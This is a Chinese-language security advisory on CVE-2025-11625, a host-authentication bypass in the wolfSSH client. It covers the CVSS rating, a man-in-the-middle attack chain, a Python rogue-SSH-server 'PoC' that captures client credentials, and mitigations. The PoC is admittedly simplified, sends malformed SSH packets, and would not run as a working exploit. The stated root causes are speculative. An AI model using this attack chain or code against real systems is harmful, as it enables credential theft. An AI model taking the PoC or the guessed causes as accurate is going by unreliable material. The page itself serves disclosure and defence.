CVE-2025-11625 wolfSSH客户端主机认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11625

漏洞类型

身份认证绕过/凭据泄露

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wolfSSH

漏洞概述

CVE-2025-11625是wolfSSH SSH客户端库中存在的一个严重安全漏洞，CVSS评分为9.8，属于严重级别。该漏洞影响了wolfSSH 1.4.20及之前版本的客户端组件。wolfSSH是由wolfSSL公司开发的一款轻量级SSH（安全外壳协议）库，广泛应用于嵌入式系统和IoT设备中，提供安全的远程登录和文件传输功能。

该漏洞的核心问题在于客户端在建立SSH连接时未正确执行主机身份验证（Host Authentication）。在标准的SSH协议中，客户端应当验证所连接服务器的真实性，以防止中间人攻击（MITM）。然而，wolfSSH客户端在1.4.20及之前的版本中，主机认证机制存在缺陷，导致攻击者可以绕过这一安全检查。

此漏洞的危害极其严重：攻击者可以利用此缺陷实施中间人攻击，伪装成合法服务器与客户端建立SSH连接，从而绕过身份认证并窃取客户端的登录凭据（包括用户名和密码或私钥等敏感信息）。一旦凭据泄露，攻击者可以进一步访问目标系统，执行未授权操作，导致数据泄露、系统入侵等严重后果。由于该漏洞无需认证、无需用户交互即可通过网络远程利用，对使用wolfSSH的应用系统构成了极大的安全威胁。

技术细节

wolfSSH客户端在执行SSH握手协议时，主机认证环节存在逻辑缺陷。正常SSH协议中，客户端在接收到服务器发送的公钥后，应当将其与本地known_hosts文件中存储的服务器指纹进行比对，以确认连接目标的真实性。但在wolfSSH 1.4.20及之前版本中，客户端未能严格实施这一验证流程。

具体而言，漏洞可能源于以下技术原因：
1. 客户端在验证服务器主机密钥时，未对密钥类型、长度或签名进行充分校验；
2. 可能存在主机认证回调函数未正确注册或被绕过的情况；
3. 在首次连接时，客户端可能无条件接受任意主机密钥而无需用户确认。

攻击利用方式：
1. 攻击者部署一个恶意SSH服务器（或实施ARP欺骗/DNS劫持进行中间人攻击）；
2. 目标客户端尝试连接合法服务器时，流量被重定向至攻击者控制的服务器；
3. 由于主机认证绕过，客户端信任攻击者提供的任意主机密钥；
4. 客户端随后发送其凭据（用户名/密码或私钥）进行用户认证；
5. 攻击者捕获这些凭据后，可用于访问真实服务器或进行其他恶意活动。

该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H，表明其通过网络可远程利用，攻击复杂度低，无需权限或用户交互，对机密性、完整性和可用性均产生高影响。

攻击链分析

STEP 1

步骤1：网络位置部署

攻击者在目标网络环境中部署恶意SSH服务器，或通过ARP欺骗、DNS劫持等方式实施中间人攻击，将目标客户端的SSH连接重定向至攻击者控制的服务器。

STEP 2

步骤2：诱导客户端连接

通过社会工程学或网络攻击手段，诱导使用wolfSSH 1.4.20及之前版本的应用客户端发起SSH连接请求。

STEP 3

步骤3：绕过主机认证

恶意服务器在SSH握手过程中发送伪造的主机密钥。由于wolfSSH客户端主机认证机制存在缺陷，未正确验证服务器身份的真实性，直接接受攻击者提供的任意主机密钥。

STEP 4

步骤4：捕获客户端凭据

主机认证绕过后，客户端继续执行用户认证流程，将用户名、密码或私钥等敏感凭据发送给攻击者控制的服务器。

STEP 5

步骤5：凭据滥用与系统入侵

攻击者利用捕获的合法凭据登录真实的SSH服务器，执行未授权操作，如数据窃取、恶意软件部署、横向移动等，进一步扩大攻击影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11625 - wolfSSH Client Host Authentication Bypass PoC # This PoC demonstrates the concept of exploiting improper host authentication # in wolfSSH clients version 1.4.20 and earlier. import socket import threading import hashlib import struct import os class MaliciousSSHServer: """ A rogue SSH server that exploits the host authentication bypass vulnerability in wolfSSH clients (CVE-2025-11625). """ def __init__(self, host='0.0.0.0', port=2222): self.host = host self.port = port self.captured_credentials = [] # Generate a rogue host key (attacker-controlled) self.rogue_host_key = hashlib.sha256(os.urandom(32)).hexdigest() def generate_ssh_banner(self): """Generate SSH protocol banner""" return b"SSH-2.0-OpenSSH_8.9 RogueServer\r\n" def handle_client(self, client_socket, address): """Handle incoming SSH connection from vulnerable client""" try: print(f"[*] Connection from {address}") # Step 1: Send SSH banner banner = self.generate_ssh_banner() client_socket.send(banner) print(f"[*] Sent banner: {banner.strip()}") # Step 2: Receive client banner client_banner = client_socket.recv(1024) print(f"[*] Client banner: {client_banner.strip()}") # Step 3: Send KEXINIT with our rogue parameters # The vulnerable wolfSSH client will accept any host key kexinit = self.build_kexinit() client_socket.send(kexinit) print("[*] Sent KEXINIT with rogue host key") # Step 4: Receive client's KEXINIT client_kexinit = client_socket.recv(4096) print("[*] Received client KEXINIT") # Step 5: Send rogue ECDH key exchange reply # Since host authentication is bypassed, client accepts this kex_reply = self.build_kex_reply() client_socket.send(kex_reply) print("[*] Sent KEX reply with rogue host key") # Step 6: Wait for client's userauth request (credentials) auth_data = client_socket.recv(4096) if auth_data: print(f"[!] CAPTURED CREDENTIALS: {auth_data.hex()}") self.captured_credentials.append({ 'source': address, 'data': auth_data, 'timestamp': os.times() }) except Exception as e: print(f"[-] Error: {e}") finally: client_socket.close() def build_kexinit(self): """Build a malicious KEXINIT packet""" # Simplified - real implementation would follow SSH spec packet = b'\x00' * 16 # cookie packet += b'curve25519-sha256' + b'\x00' packet += b'ssh-rsa' + b'\x00' packet += b'[email protected]' + b'\x00' return packet def build_kex_reply(self): """Build KEX reply with rogue host key""" # KEX reply containing attacker's host key # Vulnerable client does not verify this against known_hosts reply = struct.pack('>I', 30) # SSH_MSG_KEX_ECDH_REPLY reply += b'\x00\x00\x00\x07ssh-rsa' # key type reply += os.urandom(256) # fake RSA public key return reply def start(self): """Start the malicious SSH server""" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((self.host, self.port)) server.listen(5) print(f"[*] Malicious SSH server listening on {self.host}:{self.port}") print("[*] Waiting for vulnerable wolfSSH clients...") while True: client, addr = server.accept() thread = threading.Thread(target=self.handle_client, args=(client, addr)) thread.daemon = True thread.start() if __name__ == "__main__": print("=" * 60) print("CVE-2025-11625 PoC - wolfSSH Host Authentication Bypass") print("=" * 60) server = MaliciousSSHServer(port=2222) try: server.start() except KeyboardInterrupt: print("\n[*] Server stopped") print(f"[*] Total credentials captured: {len(server.captured_credentials)}")

影响范围

wolfSSH <= 1.4.20

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在SSH客户端配置中启用严格的主机密钥检查（StrictHostKeyChecking yes），确保客户端拒绝未在known_hosts中的主机密钥；2）使用VPN或TLS等加密隧道保护SSH连接，防止网络层面的中间人攻击；3）监控网络流量，检测异常的SSH握手和未授权的服务器响应；4）对所有SSH连接实施日志审计，及时发现可疑活动；5）限制受影响系统的网络访问范围，仅允许必要的出站SSH连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11625
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11625
3 Details https://www.cvedetails.com/cve/CVE-2025-11625/
4 VulDB https://vuldb.com/cve/CVE-2025-11625
5 Link https://github.com/wolfSSL/wolfssh/pull/840